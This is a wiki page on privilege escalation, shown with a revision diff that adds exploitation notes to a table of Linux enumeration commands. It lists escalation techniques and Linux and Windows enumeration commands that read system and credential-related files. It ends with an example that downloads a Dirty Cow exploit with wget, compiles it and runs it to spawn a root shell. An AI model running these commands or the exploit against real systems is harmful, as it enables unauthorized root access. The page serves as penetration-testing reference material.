Privilege Escalation: Difference between revisions

From HackOps
Jump to navigation Jump to search
← Older editNewer edit →
VisualWikitext
Line 82: Line 82:
=== Linux Enumeration Commands ===
=== Linux Enumeration Commands ===
{| class="wikitable sortable"
{| class="wikitable sortable"
! Purpose !! Command
! Purpose !! Command !! Potential Use in Privilege Escalation
|-
|-
| SUID/SGID binaries || <code>find / -perm -4000 2>/dev/null</code>
| SUID/SGID binaries || <code>find / -perm -4000 2>/dev/null</code> || May reveal misconfigured binaries that can be exploited for privilege escalation.
|-
|-
| Kernel version || <code>uname -a</code>
| Kernel version || <code>uname -a</code> || Identifying vulnerable kernel versions that have known local privilege escalation exploits.
|-
|-
| Environment variables || <code>env</code>
| Environment variables || <code>env</code> || May expose sensitive paths or misconfigured variables usable in custom script execution.
|-
|-
| Running processes || <code>ps aux</code>
| Running processes || <code>ps aux</code> || Reveals running services or scripts running as root; useful for process injection or misconfigurations.
|-
|-
| Installed packages (Debian) || <code>dpkg -l</code>
| Installed packages (Debian) || <code>dpkg -l</code> || Can identify vulnerable software versions or unintended package installs.
|-
|-
| Installed packages (Red Hat) || <code>rpm -qa</code>
| Installed packages (Red Hat) || <code>rpm -qa</code> || Same as above, but for RPM-based systems.
|-
|-
| Writable directories || <code>find / -writable 2>/dev/null</code>
| Writable directories || <code>find / -writable 2>/dev/null</code> || Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
|-
|-
| Cron jobs || <code>cat /etc/crontab</code>
| Cron jobs || <code>cat /etc/crontab</code> || Look for jobs running as root or referencing writable scripts.
|-
|-
| User info || <code>cat /etc/passwd</code>
| User info || <code>cat /etc/passwd</code> || Useful for identifying users, shell access, and potential privilege chaining.
|-
|-
| Group info || <code>cat /etc/group</code>
| Group info || <code>cat /etc/group</code> || Can show membership in sensitive groups like `sudo`, `docker`, or `adm`.
|-
|-
| OS version info (Generic) || <code>cat /etc/issue</code>
| OS version info (Generic) || <code>cat /etc/issue</code> || Helps fingerprint system for targeted exploits.
|-
|-
| OS version info (All common release files) || <code>cat /etc/*-release</code>
| OS version info (All common release files) || <code>cat /etc/*-release</code> || Same purpose — confirms distro and version for exploit matching.
|-
|-
| OS version (Debian based) || <code>cat /etc/lsb-release</code>
| OS version (Debian based) || <code>cat /etc/lsb-release</code> || Specifically useful for identifying Ubuntu/Debian versions.
|-
|-
| OS version (Red Hat based) || <code>cat /etc/redhat-release</code>
| OS version (Red Hat based) || <code>cat /etc/redhat-release</code> || Same, but for RHEL/CentOS systems.
|-
|-
| Kernel version & architecture || <code>cat /proc/version # Shows detailed kernel version and build info</code><br>
| Kernel version & architecture || <code>cat /proc/version # Shows detailed kernel version and build info</code><br>
Line 117: Line 117:
<code>rpm -q kernel # Lists installed kernel packages (RPM-based systems)</code><br>
<code>rpm -q kernel # Lists installed kernel packages (RPM-based systems)</code><br>
<code>dmesg | grep Linux # Extracts kernel-related boot messages</code><br>
<code>dmesg | grep Linux # Extracts kernel-related boot messages</code><br>
<code>ls /boot | grep vmlinuz- # Lists available kernel images in /boot</code>
<code>ls /boot | grep vmlinuz- # Lists available kernel images in /boot</code> || Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture.
 
 
|}
|}


Revision as of 18:07, 30 May 2025

Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access — often enabling lateral movement, persistence, or full system compromise.

Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege).

Privilege escalation is rarely a one-step action — it follows a structured process:

  • Collect – Perform thorough enumeration across the system.
  • Process – Organize and analyze the data to identify promising leads.
  • Search – Identify known vulnerabilities and locate suitable exploit code.
  • Adapt – Customize the exploit to match the specific environment.
  • Try – Execute and iterate; exploitation often requires trial and error.


Operational Context

Privilege escalation typically follows successful Initial Access, especially when the initial compromise grants access only to limited user accounts.

This phase is crucial for:

  • Achieving administrative control (root, SYSTEM)
  • Enabling credential extraction and lateral movement
  • Bypassing sandboxed or containerized environments
  • Establishing persistence mechanisms (e.g., registry, startup tasks)

Vertical Privilege Escalation

Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root).

Common Techniques

  • Exploiting kernel or driver vulnerabilities
  • Abusing misconfigured SUID/SGID binaries (Linux)
  • Misusing weak or world-writable service files
  • Leveraging unquoted service paths (Windows)
  • DLL hijacking or service misconfiguration
  • Stealing credentials from memory or config files
  • Abusing scheduled tasks or cron jobs
  • Exploiting insecure file permissions or ownership
  • Leveraging token impersonation or privilege tokens (Windows)
  • Dumping and cracking password hashes
  • Abusing Linux capabilities (e.g., cap_sys_admin)
  • Escaping weakly isolated Docker or LXC containers
  • Exploiting insecure ACLs or lack of integrity controls

Tools

Automated Exploitation Frameworks

Horizontal Privilege Escalation

Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access.

Common Techniques

  • Reading other users’ sensitive files due to improper permissions
  • Accessing SSH keys, config files, or tokens
  • Hijacking user sessions (e.g., TTY snooping or credential reuse)
  • Exploiting insecure file-sharing configurations (e.g., SMB shares)
  • Abuse of API tokens or database credentials found in cleartext

Tools

Enumeration Checklists

Linux Enumeration Commands

Purpose Command Potential Use in Privilege Escalation
SUID/SGID binaries find / -perm -4000 2>/dev/null May reveal misconfigured binaries that can be exploited for privilege escalation.
Kernel version uname -a Identifying vulnerable kernel versions that have known local privilege escalation exploits.
Environment variables env May expose sensitive paths or misconfigured variables usable in custom script execution.
Running processes ps aux Reveals running services or scripts running as root; useful for process injection or misconfigurations.
Installed packages (Debian) dpkg -l Can identify vulnerable software versions or unintended package installs.
Installed packages (Red Hat) rpm -qa Same as above, but for RPM-based systems.
Writable directories find / -writable 2>/dev/null Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
Cron jobs cat /etc/crontab Look for jobs running as root or referencing writable scripts.
User info cat /etc/passwd Useful for identifying users, shell access, and potential privilege chaining.
Group info cat /etc/group Can show membership in sensitive groups like `sudo`, `docker`, or `adm`.
OS version info (Generic) cat /etc/issue Helps fingerprint system for targeted exploits.
OS version info (All common release files) cat /etc/*-release Same purpose — confirms distro and version for exploit matching.
OS version (Debian based) cat /etc/lsb-release Specifically useful for identifying Ubuntu/Debian versions.
OS version (Red Hat based) cat /etc/redhat-release Same, but for RHEL/CentOS systems.
Kernel version & architecture cat /proc/version # Shows detailed kernel version and build info

uname -a # Displays all system info including kernel name and architecture
uname -mrs # Prints kernel name, version, and hardware name
rpm -q kernel # Lists installed kernel packages (RPM-based systems)
dmesg | grep Linux # Extracts kernel-related boot messages
ls /boot | grep vmlinuz- # Lists available kernel images in /boot || Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture.

Windows Enumeration Commands

Purpose Command
Whoami and privileges whoami /priv
Local groups net localgroup administrators
Services (CMD) sc query
Services (PowerShell) Get-Service
Startup registry keys reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks schtasks /query
Installed programs wmic product get name
Environment variables set
File permissions (CMD) icacls
File permissions (Sysinternals) accesschk

Example: Local Kernel Exploit (Linux)

# Download and compile local privilege escalation exploit (example: Dirty Cow variant)
wget https://www.exploit-db.com/download/40839 -O exploit.c
gcc exploit.c -o exploit
./exploit

# Output: spawns root shell if successful

Websites & References

See Also

Retrieved from "https://hackops.wiki/index.php?title=Privilege_Escalation&oldid=156"